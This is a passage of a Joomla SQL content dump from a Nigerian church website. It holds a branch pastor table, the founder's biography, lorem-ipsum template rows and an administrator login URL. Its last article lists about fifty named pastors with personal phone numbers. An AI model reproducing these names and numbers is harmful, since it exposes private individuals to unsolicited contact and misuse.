style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Drem Centre, Baltmore, USA</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Nelson Afrogha</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre, Abuja</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Ajayi Samuel</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre, Ota, Ogun State</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Tolu Aduramo</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre, Owode Ede, Osun State</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Niyi Bankole</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Drem Centre, Satellite Town Lagos</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 207px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Pastor Banjo Ibironke</span></span></span></span></span></span></p>\r\n</td>\r\n<td style=\"width: 400px;\" valign=\"top\">\r\n<p><span style=\"font-size: 11.5pt; line-height: 115%; font-family: \'Arial\',\'sans-serif\'; mso-fareast-font-family: \'Times New Roman\'; color: #403b38; mso-ansi-language: EN-GB; mso-fareast-language: EN-GB; mso-bidi-language: AR-SA;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\"><span style=\"font-size: 11.5pt; line-height: 115%;\">Dream Centre Houston, USA</span></span></span></span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>', '', 1, 37, '2016-09-01 10:37:42', 196, '', '2019-01-12 21:01:43', 196, 0, '0000-00-00 00:00:00', '2016-09-01 10:37:42', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 49, 17, '', '', 1, 12839, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(102, 309, 'Our Founder (2)', 'our-founder-2', '<p><img class=\"pic3d uk-align-right\" src=\"images/demo/intro.png\" alt=\"Joomla\" /></p>\r\n<p>[h3 dotted] <strong>Rev Olusola</strong> Ayodele Arogun[/h3]</p>\r\n<p>Rev. Olusola Ayodele Areogun is an ordained minister of the Gospel. He serves the will of God in this generation as Author, Teacher, Church Planter and Mentor of Leaders for the next generation with varied ministerial exposure and experience. He also serves as a father and cover to many up and coming ministries.</p>\r\n<p>He is the president of the Living Jesus Ministries Inc. and the general overseer of the Life Oasis International Churches. His daily Radio/TV programme, “Living by the Answer” is heard across Nigeria, Africa, UK, Europe and the US. Other outreaches include Web of Wisdom ministers’ Conference, a bi annual event to refresh and refire ministers of the gospel, the Living Jesus Ministerial Institute (A full time Bible School), Eagle Media, Spirit Meat (A freely distributed daily devotional guide) and Abundant Life House, the publishing arm has over 70 publications.</p>\r\n<p>In a vision, he saw himself standing before the Lord with other servants of God to pick their life assignment; so when his turn came, he picked a sheet of paper on which was written; “Committed to helping men realize their God given dreams in life.” This sums up the heart beat of this servant of God. He is happily married to Oyenike, also an ordained Minister of the Gospel. They are blessed with two (2) children, Joshua and Peace, who are also involved in the Ministry.</p>\r\n<p> </p>', '', 1, 2, '2012-10-11 13:46:19', 196, '', '2016-10-28 13:06:39', 0, 0, '0000-00-00 00:00:00', '2012-10-11 13:46:19', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 1, 8, '', '', 1, 459, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(103, 310, 'Dream Centre Ordained Pastors', 'ordained-pastor', '<p><img class=\"pic3d uk-align-right\" src=\"images/demo/intro.png\" alt=\"Joomla\" /></p>\r\n<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>[h3 dotted]<strong>Our</strong> Pastors[/h3]</p>\r\n<p>In erat. Pellentesque erat. Mauris vehicula vestibulum justo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla pulvinar est. Integer urna. Pellentesque pulvinar dui a magna. Nulla facilisi. Proin imperdiet. Aliquam ornare, metus vitae gravida dignissim, nisi nisl ultricies felis, ac tristique enim pede eget elit. Integer non erat nec turpis sollicitudin malesuada. Vestibulum dapibus.</p>\r\n<p>[row] [column one-half][h3 dotted]<strong>John</strong> Doe[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_1.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [column one-half] [h3 dotted]<strong>James</strong> Doe[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_2.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [/row] [row] [column one-half][h3 dotted]<strong>Don</strong> Smith[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_4.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [column one-half][h3 dotted]<strong>Lucy</strong> Liu[/h3]<strong>Pastor\'s Wife</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_3.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [/row]</p>', '', -2, 2, '2012-10-11 13:46:19', 196, '', '2016-10-28 13:15:22', 196, 0, '0000-00-00 00:00:00', '2012-10-11 13:46:19', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 1, '', '', 1, 51, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(104, 312, 'Dream Centre Ordained Pastors (2)', 'ordained-pastor-2', '<p><img class=\"pic3d uk-align-right\" src=\"images/demo/intro.png\" alt=\"Joomla\" /></p>\r\n<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>[h3 dotted]<strong>Our</strong> Pastors[/h3]</p>\r\n<p>In erat. Pellentesque erat. Mauris vehicula vestibulum justo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla pulvinar est. Integer urna. Pellentesque pulvinar dui a magna. Nulla facilisi. Proin imperdiet. Aliquam ornare, metus vitae gravida dignissim, nisi nisl ultricies felis, ac tristique enim pede eget elit. Integer non erat nec turpis sollicitudin malesuada. Vestibulum dapibus.</p>\r\n<p>[row] [column one-half][h3 dotted]<strong>John</strong> Doe[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_1.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [column one-half] [h3 dotted]<strong>James</strong> Doe[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_2.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [/row] [row] [column one-half][h3 dotted]<strong>Don</strong> Smith[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_4.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [column one-half][h3 dotted]<strong>Lucy</strong> Liu[/h3]<strong>Pastor\'s Wife</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_3.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [/row]</p>', '', -2, 2, '2012-10-11 13:46:19', 196, '', '2016-11-01 12:53:20', 0, 0, '0000-00-00 00:00:00', '2012-10-11 13:46:19', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 1, 0, '', '', 1, 36, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(105, 313, 'Pastors', 'pastors', '<p>http://ljmti.lifeoasisinternationalchurch.org/administrator/</p>\r\n<p><img class=\"pic3d uk-align-right\" src=\"images/demo/intro.png\" alt=\"Joomla\" /></p>\r\n<p class=\"dropcap\">Mauris at lectus ut purus facilisis volutpat. Aliquam nec turpis in nunc venenatis aliquam at ut enim. Etiam sed odio vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus vitae dolor feugiat cursus pulvinar quis nisi. Sed consectetur eleifend tempus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus</p>\r\n<p>[h3 dotted]<strong>Our</strong> Pastors[/h3]</p>\r\n<p>In erat. Pellentesque erat. Mauris vehicula vestibulum justo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla pulvinar est. Integer urna. Pellentesque pulvinar dui a magna. Nulla facilisi. Proin imperdiet. Aliquam ornare, metus vitae gravida dignissim, nisi nisl ultricies felis, ac tristique enim pede eget elit. Integer non erat nec turpis sollicitudin malesuada. Vestibulum dapibus.</p>\r\n<p>[row] [column one-half][h3 dotted]<strong>John</strong> Doe[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_1.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [column one-half] [h3 dotted]<strong>James</strong> Doe[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_2.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [/row] [row] [column one-half][h3 dotted]<strong>Don</strong> Smith[/h3]<strong>Senior Pastor</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_4.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [column one-half][h3 dotted]<strong>Lucy</strong> Liu[/h3]<strong>Pastor\'s Wife</strong> <img class=\"pic3d uk-align-right\" src=\"images/demo/avatar/user_3.png\" alt=\"John Doe\" width=\"48\" height=\"48\" />Tempor invidunt ut labore et dolore magna aliquyamur erat, sed diam voluptua metus vitae gravida dignissim.[/column] [/row]</p>', '', 1, 19, '2016-09-01 10:37:42', 196, '', '2016-11-01 12:54:59', 196, 0, '0000-00-00 00:00:00', '2016-09-01 10:37:42', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 0, '', '', 1, 423, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(106, 315, 'Dream Centre Ordained Pastors (2)', 'ordained-pastor-2', '<p>[list style=\"uk-list-striped\"]</p>\r\n<p>[li]<strong>Asst. Pastor Kunle OMOOTEMI</strong> - 08060072878[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Tobi Adewuyi</strong> - 07031045345[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Ife OMONIJO</strong> - 07062825734[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Olatunde OLAJOLO</strong> - 08028582269 &amp; 08038492153[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Yinka OYAYODE</strong> - 08035147968[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Kayode Odewunmi</strong> - 07060930809[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Tunji ADEDOKUN</strong> -08035276969[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Ibukun ADEBAYO</strong> - 07038548230[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Deji OGUNGBEMI</strong> - 08033506866[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Sunday ISRAEL</strong> - 08065798140[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Tolu OYEWO</strong> - 07031382171[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Adeola   MUSA</strong> - 08032225880[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Olabode</strong> - 08031300861[/li]</p>\r\n<p>[li]<strong>Asst. Pastor OLAYEMI</strong> - 07031557952[/li]</p>\r\n<p>[li]<strong>Asst. Pastor David Ojo</strong> - 08066106033[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Olaolu Oniya</strong> - 08065320267[/li]</p>\r\n<p>[li]<strong>Asst. Pastor kayode Olorunnisola</strong> - 08038539450[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Femi SARUMI</strong> - 08060165216[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Niyi SOBOWALE</strong> - 08035352110[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Toba ABE</strong> - 07034153461[/li]</p>\r\n<p>[li]<strong>Asst. Pastor (Mrs) Oloyede</strong> - 07069766796[/li]</p>\r\n<p>[li]<strong>Asst. Joel Akinkunmi</strong>[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Niyi Adenuga</strong> - 08112645950[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Samuel Olalere</strong> - 08107056220[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Ibikunle Cleopas</strong> - 08060135726[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Lanre Morenikeji</strong> - 08033612523[/li]</p>\r\n<p>[li]<strong>Asst. Pastor (Mrs) Binuomote</strong> - 08035635575[/li]</p>\r\n<p>[li]<strong>Asst. Pastor(Mrs) Yemisi Shobowale</strong> - 08033049996[/li]</p>\r\n<p>[li]<strong>Pastor Samuel Binuomote</strong> - 08033879828,08127373780 &amp; 07086193570[/li]</p>\r\n<p>[li]<strong>Pastor Charles Abiona</strong> - 08034756335[/li]</p>\r\n<p>[li]<strong>Pastor Soji OLOYEDE</strong> - 08064463869[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Gbenga Abe</strong> - 07031846832[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Tomiwa AKINTUNDE</strong> - 07062650892,08189078093[/li]</p>\r\n<p>[li]<strong>Pastor Seun Kolapo</strong> - 08033856075[/li]</p>\r\n<p>[li]<strong>Pastor Lekan AWE</strong> - 08036207471[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Niyi AKINDOYIN</strong> - 08037276316[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Wale Olansebe</strong> - 08038720908,07034129416 &amp; 08105434047[/li]</p>\r\n<p>[li]<strong>Asst Pastor Tunde Ogunkoya</strong> - 07064335373[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Segun ADETUNJI</strong> - 07041838990 &amp; 07027950907[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Muyiwa OLATUNJI</strong> - 08053047866 &amp; 08084351078[/li]</p>\r\n<p>[li]<strong>Asst Pastor Enitan Egbeyemi</strong>- 08033878871[/li]</p>\r\n<p>[li]<strong>Asst Pastor Seyi Oluwatuyi</strong> - 08056596102[/li]</p>\r\n<p>[li]<strong>Asst Pastor David Alabi</strong> - 08037608645[/li]</p>\r\n<p>[li]<strong>Asst Pastor Demola Adekanmi</strong> - 08033544856[/li]</p>\r\n<p>[li]<strong>Asst. Pastor Seun Akinyemi</strong> - 08035772770[/li]</p>\r\n<p>[li]<strong>Pastor Sogo Adediran</strong> - +447508782839[/li]</p>\r\n<p>[li]<strong>Pastor Dayo Owoeye</strong> - +447947923893[/li]</p>\r\n<p>[li]<strong>Pastor Biodun Akinyemi</strong> - +447411810572[/li]</p>\r\n<p>[li]<strong>Pastor kehinde Odeniyi</strong> - +447587840610[/li]</p>\r\n<p>[li]<strong>Asst Pastor Joshua Areogun</strong>[/li]    </p>\r\n<p>[/list]</p>', '', -2, 37, '2016-09-01 10:37:42', 196, '', '2016-11-03 14:20:48', 196, 0, '0000-00-00 00:00:00', '2016-09-01 10:37:42', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 0, '', '', 1, 28, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
